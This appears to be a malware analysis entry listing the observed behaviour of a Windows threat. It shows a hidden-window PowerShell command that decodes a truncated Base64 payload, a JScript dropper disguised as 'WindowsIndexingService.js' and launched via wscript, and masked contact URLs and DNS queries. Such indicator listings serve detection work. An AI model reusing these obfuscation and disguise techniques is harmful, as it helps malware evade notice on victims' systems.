Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $a = [string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( 'O2lmKCgoR2V0LVVJQ3VsdHVyZSkuTmFtZSAtbWF0Y2ggIkNOfFJPfFJVfFVBfEJZIikgLW9yICgoR2V0LVdtaU9iamVjdCAtY2xhc3M...
- C:\users\public\libraries\windowsindexingservice.js
- http://yo#.####essstakeyouth.com/?pa########################
- DNS ASK go##.##lancedbeans.ca
- DNS ASK yo#.####essstakeyouth.com
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\Libraries\WindowsIndexingService.js"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $a = [string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( 'O2lmKCgoR2V0LVVJQ3VsdHVyZSkuTmFtZSAtbWF0Y2ggIkNOfFJPfFJVfFVBfEJZIikgLW9yICgoR2V0LVdtaU9iamVjdCAtY2xhc3M...' (with hidden window)